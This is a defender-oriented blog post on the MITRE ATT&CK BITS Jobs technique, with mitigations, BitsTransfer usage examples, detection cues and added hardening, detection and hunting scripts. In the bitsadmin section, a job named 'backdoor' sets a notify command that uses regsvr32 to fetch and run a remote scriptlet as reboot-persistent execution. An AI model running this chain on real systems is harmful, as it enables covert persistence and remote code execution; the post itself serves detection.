100 Days of MITRE ATT&CK — #1

100 Days of MITRE ATT&CK
Apr 5, 2022

* Most probably I will not publish a new post every day, but I will publish at least 100 posts in this series. My aim is to find the motivation to learn certain techniques, and while doing this the original content from MITRE will of course be my guide; I will try to create pragmatic posts for defenders.

BITS Jobs — T1197 — Defense Evasion, Persistence

Windows Background Intelligent Transfer Service (BITS) sounds, from the name alone, useful for both legitimate and malicious purposes. It is a file transfer mechanism commonly used by applications that operate in the background (updaters, messengers): it uses idle bandwidth so that other networked applications are not interrupted, and a transfer survives reboots and network interruptions, which is exactly what makes it attractive for persistence. File transfers are expressed as BITS jobs.

BITS jobs can be created and managed through the PowerShell BitsTransfer module, the bitsadmin.exe command-line tool, or programmatically through the BITS COM interface.

To prevent malicious usage, the following can be recommended: limit access to the BITS interface to specific users or groups; restrict network access (host and network firewall rules) to legitimate BITS traffic only, which requires a baseline of who talks to where; and reduce the default BITS job lifetime (90 days of inactivity) through Group Policy or the JobInactivityTimeout and MaxDownloadTime registry values, so a parked job cannot serve as persistence and evasion for months.
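The following PowerShell is an added example, not code from the original post: it audits the BITS job-lifetime policy and, with -Apply, tightens it. The registry key and value names are the ones the "Timeout for inactive BITS jobs" and "Maximum download time" Group Policy settings write; the limits chosen here (1 day, 1 hour) and the -Apply switch are assumptions for illustration and must be validated against legitimate BITS users (Windows Update, management agents) before rolling out.

```powershell
# Added example, not code from the original post. Audits the BITS job
# lifetime policy and optionally tightens it. Run elevated to write.
# Assumptions: the limits below are illustrative; check them against your
# own baseline of legitimate BITS consumers first.
[CmdletBinding()]
param(
    [int]$InactiveDays       = 1,     # "Timeout for inactive BITS jobs" (BITS default: 90 days)
    [int]$MaxDownloadSeconds = 3600,  # "Maximum download time"
    [switch]$Apply
)

$PolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\BITS'

function Get-BitsLifetimePolicy {
    # The values are absent until a policy has been set; BITS then uses its defaults.
    $props = Get-ItemProperty -Path $PolicyKey -ErrorAction SilentlyContinue
    [pscustomobject]@{
        JobInactivityTimeoutDays = if ($null -ne $props.JobInactivityTimeout) { $props.JobInactivityTimeout } else { 90 }
        MaxDownloadTimeSeconds   = if ($null -ne $props.MaxDownloadTime) { $props.MaxDownloadTime } else { 'not configured (BITS default)' }
        PolicyConfigured         = ($null -ne $props.JobInactivityTimeout)
    }
}

function Set-BitsLifetimePolicy {
    param([int]$Days, [int]$Seconds)
    if (-not (Test-Path $PolicyKey)) { New-Item -Path $PolicyKey -Force | Out-Null }
    Set-ItemProperty -Path $PolicyKey -Name JobInactivityTimeout -Value $Days    -Type DWord
    Set-ItemProperty -Path $PolicyKey -Name MaxDownloadTime      -Value $Seconds -Type DWord
}

$before = Get-BitsLifetimePolicy
Write-Host 'Current policy:'
$before | Format-List

if ($Apply) {
    if ($before.PolicyConfigured -and $before.JobInactivityTimeoutDays -le $InactiveDays) {
        Write-Host "Inactivity timeout is already $($before.JobInactivityTimeoutDays) day(s); nothing to do."
    } else {
        Set-BitsLifetimePolicy -Days $InactiveDays -Seconds $MaxDownloadSeconds
        Write-Host 'Policy after change:'
        Get-BitsLifetimePolicy | Format-List
    }
}
```

On a domain-joined host the same key is managed by Group Policy, so set the value there rather than locally, or the next policy refresh will overwrite it.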

To detect malicious BITS activity we need to monitor the creation of BITS jobs: the commands that create them (PowerShell, WinRM/WMI, bitsadmin) and the Microsoft-Windows-Bits-Client/Operational event log, where Event ID 3 records every new job. For threat hunting and investigation, checking the BITS job database (the queue the BITS service keeps on disk) is very useful. First, some usage examples.

PowerShell

# 1. Synchronous job: copy every .txt file from the source directory into c:\clientdir
Start-BitsTransfer -Source C:\clientsourcedir\*.txt -Destination c:\clientdir\ -TransferType Download

# 2. Many files at once: source/destination pairs are read from a CSV file
Import-CSV filelist.txt | Start-BitsTransfer -TransferType Upload

# 3. Asynchronous job: the cmdlet returns immediately and the job is polled until it finishes
$Job = Start-BitsTransfer -Source https://Server1.TrustedDomain.com/File1.zip `
    -Destination d:\temp\downloads\ -Asynchronous

# Poll for status, sleep for 5 seconds, or perform an action.
while (($Job.JobState -eq "Transferring") -or ($Job.JobState -eq "Connecting")) { Start-Sleep -Seconds 5 }

Switch ($Job.JobState)
{
    "Transferred" { Complete-BitsTransfer -BitsJob $Job }   # Files are only written to the destination once the job is completed.
    "Error"       { $Job | Format-List }                     # List the errors.
    default       { "Other action" }                         # Perform corrective action.
}

In the Import-CSV example, the source and destination of each file come from filelist.txt, so that file must follow the layout Start-BitsTransfer accepts from the pipeline: a header row with Source and Destination columns and one file per line.

*As the usual suspects, Start-BitsTransfer and Get-BitsTransfer (used to enumerate active BITS transfers) are the two main cmdlets to look for in PowerShell logs (script block logging, Event ID 4104). Add-BitsFile, Set-BitsTransfer and Resume-BitsTransfer, which add files to, modify or restart an existing job, belong on the same watch list.

Using WinRM PowerShell Commands

# Get the credentials to connect to the remote client computer
$cred = Get-Credential
# Type=0 is a download job; the file is pulled from RemoteUrl to LocalFile on Client1
$result = Invoke-WsmanAction -Action CreateJob -ResourceURI wmi/root/microsoft/bits/BitsClientJob `
    -ValueSet @{DisplayName="TestJob"; RemoteUrl="https://Server01/servertestdir/testfile1.txt"; LocalFile="C:\clienttestdir\testfile1.txt"; Type=0} `
    -ComputerName Client1 -Credential $cred

*Checking for BitsClientJob in the resource URI of Invoke-WsmanAction calls is another detection point; note that the job is created on the remote computer, so the PowerShell log on the source host is the only place this shows up as a command.

Using WMI PowerShell Commands

$cred = Get-Credential
# Lists the BITS Compact Server URL group class on Server1 through the BITS WMI provider
$bcs = Get-WmiObject -Namespace "root\Microsoft\BITS" -Class "BITSCompactServerUrlGroup" `
    -List -ComputerName Server1 -Credential $cred

*Checking for BITS provider classes such as BitsCompactServerUrlGroup in PowerShell commands is also a way of detecting. Other BITS provider classes are BitsClientFile and BitsClientJob. Match on the namespace and class names rather than on the cmdlet, because Get-CimInstance reaches the same provider as Get-WmiObject.

Installation of BITS Compact Server

PS C:\> Import-Module ServerManager
PS C:\> Add-WindowsFeature BITS-Compact-Server

Success Restart Needed Exit Code Feature Result
------- -------------- --------- --------------
True    No             Success   {Compact Server}

  • Again in the PowerShell logs, look for Add-WindowsFeature (or Install-WindowsFeature) with BITS-Compact-Server; the Compact Server lets a host serve files over BITS, so an unexpected install turns an endpoint into a file server.

By using the BitsAdmin command-line tool

# create a job named "backdoor"
bitsadmin /create backdoor

# add a "download" that completes locally: cmd.exe is copied to %temp%, so the job reaches the Transferred state without any network access
bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe

# when the job finishes, run regsvr32 with a remote .sct scriptlet; the job and its notify command line persist in the BITS queue across reboots until the job expires or is completed/cancelled
bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"

# start (or restart) the job
bitsadmin /Resume backdoor

  • From Windows process creation logs (Security Event ID 4688 with command-line auditing, or Sysmon Event ID 1), the bitsadmin.exe process name combined with /create, /addfile, /transfer, /SetNotifyCmdLine, /SetNotifyFlags, /SetMinRetryDelay, /SetCustomHeaders or /resume helps us detect this. /SetNotifyCmdLine is rarely used legitimately and deserves a high-severity alert on its own.
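To turn the detection notes above (PowerShell cmdlets, WinRM/WMI provider classes, the Compact Server feature and bitsadmin switches) into something that runs, here is an added PowerShell example that is not part of the original post. It defines the rules once and exercises them on a constructed set of sample log entries; the Source/Text field names are this script's own and must be mapped to the real fields (CommandLine in 4688 and Sysmon 1, ScriptBlockText in 4104) before pointing it at live telemetry.

```powershell
# Added example, not code from the original post. Rule set for the BITS
# indicators discussed in the post, run over constructed sample events.
# Assumption: field names Source/Text are this script's own.

# Constructed sample events (not real telemetry). example.invalid is a reserved test domain.
$SampleEvents = @(
    [pscustomobject]@{ Source = 'Sysmon:1'; Text = 'bitsadmin.exe /create backdoor' }
    [pscustomobject]@{ Source = 'Sysmon:1'; Text = 'bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://example.invalid/calc.sct scrobj.dll"' }
    [pscustomobject]@{ Source = 'Sysmon:1'; Text = 'bitsadmin.exe /transfer upd /download /priority normal https://example.invalid/a.exe C:\Users\Public\a.exe' }
    [pscustomobject]@{ Source = 'PS:4104';  Text = 'Start-BitsTransfer -Source https://example.invalid/File1.zip -Destination $env:TEMP -Asynchronous' }
    [pscustomobject]@{ Source = 'PS:4104';  Text = 'Invoke-WsmanAction -Action CreateJob -ResourceURI wmi/root/microsoft/bits/BitsClientJob -ValueSet @{Type=0}' }
    [pscustomobject]@{ Source = 'PS:4104';  Text = 'Get-WmiObject -Namespace root\Microsoft\BITS -Class BITSCompactServerUrlGroup -List' }
    [pscustomobject]@{ Source = 'PS:4104';  Text = 'Add-WindowsFeature BITS-Compact-Server' }
    [pscustomobject]@{ Source = 'Sysmon:1'; Text = 'bitsadmin.exe /list /allusers /verbose' }   # hunting activity, low interest
    [pscustomobject]@{ Source = 'PS:4104';  Text = 'Get-Process | Where-Object CPU -gt 10' }    # unrelated, must not match
)

# One rule per indicator family: regex, severity, human-readable label.
$Rules = @(
    @{ Pattern = '(?i)bitsadmin(\.exe)?\s+/SetNotifyCmdLine\b';                                                     Severity = 'High';   Label = 'bitsadmin notify command (code execution on job completion)' }
    @{ Pattern = '(?i)bitsadmin(\.exe)?\s+/(create|addfile|transfer|resume|SetNotifyFlags|SetMinRetryDelay|SetCustomHeaders)\b'; Severity = 'Medium'; Label = 'bitsadmin job creation/modification' }
    @{ Pattern = '(?i)\b(Start|Set|Resume)-BitsTransfer\b|\bAdd-BitsFile\b';                                        Severity = 'Medium'; Label = 'BitsTransfer module job creation/modification' }
    @{ Pattern = '(?i)\bBitsClient(Job|File)\b|\bBITSCompactServerUrlGroup\b';                                      Severity = 'Medium'; Label = 'BITS WMI/WinRM provider class' }
    @{ Pattern = '(?i)\bBITS-Compact-Server\b';                                                                     Severity = 'Medium'; Label = 'BITS Compact Server feature install' }
    @{ Pattern = '(?i)\bGet-BitsTransfer\b|bitsadmin(\.exe)?\s+/list\b';                                            Severity = 'Low';    Label = 'BITS job enumeration' }
)
$Rank = @{ High = 3; Medium = 2; Low = 1; None = 0 }

function Test-BitsIndicator {
    param([Parameter(Mandatory)][string]$Text)
    $hits = @(foreach ($r in $Rules) { if ($Text -match $r.Pattern) { $r } })
    $top  = $hits | Sort-Object { $Rank[$_.Severity] } -Descending | Select-Object -First 1
    [pscustomobject]@{
        Matched  = ($hits.Count -gt 0)
        Severity = if ($top) { $top.Severity } else { 'None' }
        Reasons  = @($hits | ForEach-Object { $_.Label })
    }
}

$SampleEvents | ForEach-Object {
    $r = Test-BitsIndicator -Text $_.Text
    [pscustomobject]@{ Rank = $Rank[$r.Severity]; Severity = $r.Severity; Source = $_.Source; Reasons = ($r.Reasons -join '; '); Text = $_.Text }
} | Where-Object Matched -ne $false | Where-Object Severity -ne 'None' |
    Sort-Object Rank -Descending | Format-Table Severity, Source, Reasons, Text -AutoSize -Wrap
```

The same regexes carry over to a SIEM rule almost unchanged; the point of keeping the severity on the rule rather than on the event is that a single /SetNotifyCmdLine hit should page someone, while Get-BitsTransfer from a SOC analyst's shell should not.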

During threat hunting or investigation, the following command lists active BITS jobs for every user (it needs administrative rights; without them only your own jobs are shown): bitsadmin /list /allusers /verbose. Get-BitsTransfer -AllUsers returns the same jobs as objects. The on-disk job database at %ALLUSERSPROFILE%\Microsoft\Network\Downloader (qmgr.db on Windows 10 and later, qmgr0.dat and qmgr1.dat on earlier versions) can also be parsed offline to recover jobs that have already been completed or cancelled and no longer appear in the list.
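As an added example (not from the original post), this PowerShell does the hunting step with Get-BitsTransfer -AllUsers instead of bitsadmin, flags the job attributes that matter (a notify command line, a remote host outside a baseline, an executable dropped into a user-writable path, a job parked in the Transferred state), and pulls the matching Microsoft-Windows-Bits-Client/Operational events. The allow-list, the staleness threshold and the "suspicious path" pattern are assumptions to be replaced with your own baseline; the job property names are the ones the BitsTransfer module exposes on its job objects.

```powershell
# Added example, not code from the original post. Enumerates every user's BITS
# jobs from an elevated PowerShell and flags the ones worth a closer look.
# Assumptions: allow-list, thresholds and path pattern below are illustrative.
Import-Module BitsTransfer

$AllowedRemoteHosts = @('Server1.TrustedDomain.com', 'windowsupdate.com', 'delivery.mp.microsoft.com')  # assumed baseline
$StaleAfterDays     = 2   # assumption: legitimate updaters complete their jobs within a couple of days

function Test-AllowedHost {
    param([string]$Url)
    $u = $null
    if (-not [uri]::TryCreate($Url, [System.UriKind]::Absolute, [ref]$u)) { return $false }
    foreach ($a in $AllowedRemoteHosts) {
        if ($u.Host -eq $a -or $u.Host.EndsWith(".$a")) { return $true }
    }
    return $false
}

function Get-SuspiciousBitsJob {
    # -AllUsers needs administrator rights; without it only the caller's jobs are returned.
    foreach ($job in Get-BitsTransfer -AllUsers) {
        $reasons = @()
        if ($job.NotifyCmdLine) { $reasons += "NotifyCmdLine set: $($job.NotifyCmdLine)" }
        foreach ($f in $job.FileList) {
            if ($f.RemoteName -match '^https?://' -and -not (Test-AllowedHost $f.RemoteName)) {
                $reasons += "remote host not in allow-list: $($f.RemoteName)"
            }
            if ($f.LocalName -match '\\(Temp|Public|Downloads)\\' -and $f.LocalName -match '\.(exe|dll|ps1|vbs|js|sct|bat|cmd)$') {
                $reasons += "executable written to user-writable path: $($f.LocalName)"
            }
        }
        # A job that is Transferred but never completed keeps its files (and notify command) in the queue.
        if ($job.JobState -eq 'Transferred' -and $job.CreationTime -lt (Get-Date).AddDays(-$StaleAfterDays)) {
            $reasons += "job left uncompleted since $($job.CreationTime)"
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Owner   = $job.OwnerAccount
                Id      = $job.JobId
                Name    = $job.DisplayName
                State   = $job.JobState
                Created = $job.CreationTime
                Reasons = ($reasons -join '; ')
            }
        }
    }
}

function Get-RecentBitsJobEvents {
    # Microsoft-Windows-Bits-Client/Operational: 3 = job created, 4 = transfer complete,
    # 59 = transfer started (message includes the URL), 60 = transfer stopped (includes status code).
    param([int]$Days = 7)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Bits-Client/Operational'; Id = 3, 4, 59, 60; StartTime = (Get-Date).AddDays(-$Days) } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, @{ n = 'Message'; e = { ($_.Message -split "`r?`n")[0] } }
}

Get-SuspiciousBitsJob   | Format-Table -AutoSize -Wrap
Get-RecentBitsJobEvents | Format-Table -AutoSize -Wrap
```

Event ID 59 is the one to correlate with proxy or firewall logs, since it carries the remote URL even when the job was created through the COM API and never touched bitsadmin or PowerShell.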

Leviathan and APT41 are among the groups MITRE lists as using this technique to download payloads and additional tools.
